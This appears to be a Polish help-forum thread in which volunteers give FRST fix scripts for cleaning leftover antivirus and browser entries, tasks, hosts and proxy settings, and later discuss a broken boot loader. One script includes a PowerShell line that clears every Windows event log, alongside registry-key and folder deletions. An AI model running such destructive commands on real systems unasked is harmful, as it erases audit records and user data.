Raporty nie wykazują oznak infekcji (co konkretnie wykryła Avira)? Sprzątam system z resztek po oprogramowaniu (m.in po Mozilla FireFox), kasuje martwe wpisy / skróty itd. 

1. Instalacja Baidu jest uszkodzona, na początek przejdź do lokalizacji C:\Program Files (x86)\Baidu Security i z tego poziomu spróbuj uruchomić plik deinstalacyjny (nazwa zbliżona do uninstall.exe).

2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść:

CloseProcesses:
CreateRestorePoint:
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia 
SearchScopes: HKU\S-1-5-21-651531635-3565247976-1847686583-1001 -> DefaultScope {F7F3221E-776D-4531-A3C6-2A15A2EEF92D} URL = 
SearchScopes: HKU\S-1-5-21-651531635-3565247976-1847686583-1001 -> {F7F3221E-776D-4531-A3C6-2A15A2EEF92D} URL =
S2 BAVSvc; "C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BAVSvc.exe" [X]
S2 BHipsSvc; "C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BHipsSvc.exe" [X]
S2 MxService; C:\Program Files (x86)\Maxthon\Bin\MxService.exe [X]
U0 aswVmm; Brak ImagePath
S3 BdApiUtil; \??\C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BdApiUtil64.sys [X]
S3 BdCameraProtect; \??\C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BdCameraProtect64.sys [X]
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
ShellIconOverlayIdentifiers: [baiduAntivirusIconLock] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CC} => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BavShx64.dll -> Brak pliku
ContextMenuHandlers1: [baidu_Scan] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CB} => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BavShx64.dll -> Brak pliku
ContextMenuHandlers2: [baidu_Scan] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CB} => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BavShx64.dll -> Brak pliku
ContextMenuHandlers6: [baidu_Scan] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CB} => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BavShx64.dll -> Brak pliku
Task: {3FF52764-72BA-4E9A-AC46-FDBF2AED9F00} - \Lenovo\Experience Improvement -> Brak pliku 
C:\Users\Irena\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk
C:\Users\Irena\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk
C:\Users\Irena\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Irena\AppData\Local\Mozilla
C:\Users\Irena\AppData\Roaming\Mozilla
C:\Users\Irena\AppData\Roaming\Profiles
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp: 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt

3. Wyczyść przeglądarkę Google Chrome:

• Zresetuj synchronizację (o ile włączona): KLIK.
• Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
• Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
• Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.

5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Temat zostanie przeniesiony do działu Pomocy doraźnej, gdyż dotyczy tematyki malware.

Podobny temat: KLIK. 

W raportach brak oznak infekcji, nie wykluczone, że to był tylko "reklamowy straszak", aczkolwiek widoczny jest wzrost takich przypadków. 

Do spoilera zadaję działania kosmetyczne do wykonania (kasacja martwych wpisów / resztek po oprogramowaniu / czyszczenie zanieczyszczonego pliku Hosts / usunięcie Proxy*):

CloseProcesses:
CreateRestorePoint:
BootExecute: autocheck autochk *  
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-3412699975-1278123406-526146009-1000 -> {4040FF30-82A0-4C87-BD1D-D8FB4606EB39} URL = 
Handler: http - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} -  Brak pliku
Handler: http - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} -  Brak pliku
Handler: https - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} -  Brak pliku
Handler: https - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} -  Brak pliku
Handler: ipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} -  Brak pliku
Handler: msdaipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} -  Brak pliku
Handler: msdaipp - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} -  Brak pliku
FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku]
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird => nie znaleziono
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird => nie znaleziono
FF Plugin: @tracker-software.com/PDF-XChange Viewer Plugin,version=1.0,application/pdf -> C:\PROGRA~1\TRACKE~1\PDFVIE~1\npPDFXCviewNPPlugin.dll [brak pliku]
FF Plugin-x32: @tracker-software.com/PDF-XChange Viewer Plugin,version=1.0,application/pdf -> C:\PROGRA~1\TRACKE~1\PDFVIE~1\Win32\npPDFXCviewNPPlugin.dll [brak pliku]
S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X]
Task: {1DF7E60D-5E18-4EFA-8BB2-D6CE51B038F1} - System32\Tasks\{3E446D0C-1F1F-476F-86CB-62762DCFA051} => C:\Windows\system32\pcalua.exe -a "C:\Users\STERN WEBER POLSKA\Downloads\lide200vst641403ea24.exe" -d "C:\Users\STERN WEBER POLSKA\Downloads"
Task: {5DC70338-CD90-493C-965E-05F06A22B7BF} - System32\Tasks\{531C8383-581C-4350-A5F5-7455ECF5305F} => C:\Windows\system32\pcalua.exe -a "C:\Users\STERN WEBER POLSKA\Downloads\Instalki\ntregopt-setup.exe" -d "C:\Users\STERN WEBER POLSKA\Downloads\Instalki"
Task: {D45262A2-3B7E-40B3-BB9C-E4E13109BFFD} - System32\Tasks\{9C09267C-9C7D-4C90-96A7-6F0AFA2FEC87} => C:\Windows\system32\pcalua.exe -a "C:\Users\STERN WEBER POLSKA\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2BNRG6CT\OOo_3.3.0_Win_x86_install_pl.exe" -d "C:\Users\STERN WEBER POLSKA\Desktop"
Task: {F75704C9-4053-4958-8DDA-B673933AB080} - System32\Tasks\{6CCC84F6-36CA-406D-AE6F-0CEDFA9A251C} => C:\Windows\system32\pcalua.exe -a "C:\Users\STERN WEBER POLSKA\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\O7MPWQGC\unrarw32.exe" -d "C:\Users\STERN WEBER POLSKA\Desktop"
Task: {FE658D1E-DD1E-44D3-8BB8-452AFB1E986D} - System32\Tasks\{82B4E40E-7AC4-4953-B7B0-18EDF84A811E} => C:\Windows\system32\pcalua.exe -a "C:\Users\STERN WEBER POLSKA\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\O7MPWQGC\OOo_3.3.0_Win_x86_install-wJRE_pl (1).exe" -d "C:\Users\STERN WEBER POLSKA\Desktop"
ContextMenuHandlers1: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} =>  -> Brak pliku
ContextMenuHandlers4: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} =>  -> Brak pliku
ContextMenuHandlers6: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} =>  -> Brak pliku
ContextMenuHandlers2: [PuranDefrag] -> [CC]{E23C9C4A-0F55-40e2-A47F-93DCB54DF04D} =>  -> Brak pliku
ContextMenuHandlers2: [TeraCopy] -> [CC]{A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} =>  -> Brak pliku
ContextMenuHandlers2: [TeraCopyS64] -> [CC]{A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} =>  -> Brak pliku
ContextMenuHandlers6: [TeraCopy] -> [CC]{A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} =>  -> Brak pliku
ContextMenuHandlers6: [TeraCopyS64] -> [CC]{A764EEF0-D6E8-48AF-8DFA-023B1CF660A7} =>  -> Brak pliku
ContextMenuHandlers4: [Offline Files] -> [CC]{474C98EE-CF3D-41f5-80E3-4AAB0AB04301} =>  -> Brak pliku
ContextMenuHandlers6: [Offline Files] -> [CC]{474C98EE-CF3D-41f5-80E3-4AAB0AB04301} =>  -> Brak pliku
ContextMenuHandlers6: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} =>  -> Brak pliku
AlternateDataStreams: C:\ProgramData\TEMP:58A5270D [150]
Hosts:
RemoveProxy:
EmptyTemp:

* jeśli proxy jest ustawione celowo to proszę usunąć ze skryptu linijkę RemoveProxy:

Świetnie (ja już też zacząłem kombinować z ręczną odbudową, a tu taka miła niespodzianka!). 

Tamtych kroków nie wykonuj!

Proszę o pełny zestaw raportów FRST (FRST, Addition, Shortcut). Tej infekcji z loaderem nie będę ruszać i zobaczę tylko w jakim jest stanie. Czy reklamy w przeglądarce ustąpiły (pytam, byśmy mieli klarowną sytuację)? 

Dobrze. Wiemy już raczej wystarczająco. Nie podejmuj żadnych działań, by nie namieszać. Myślę, że picasso odpowie jak najszybciej będzie mogła. 

Poczekajmy proszę teraz na picasso, jak już mówiłem poinformowałem ją, wolę niczego nie robić już tu na własną rękę. 

Hm...

No nic poczekamy na picasso to się dowiemy.

Moze przez biosa da rade jakoś cos zrobić?

Masz płytę Windows, więc będziemy mieli dostęp do WinRe. Nie jesteśmy na szczęście w czarnej kropce (Windows przypuszczalnie nie wie, którego loadera ma użyć - i to będzie trzeba ustawić, ale jak mówię: wolę poczekać na picasso).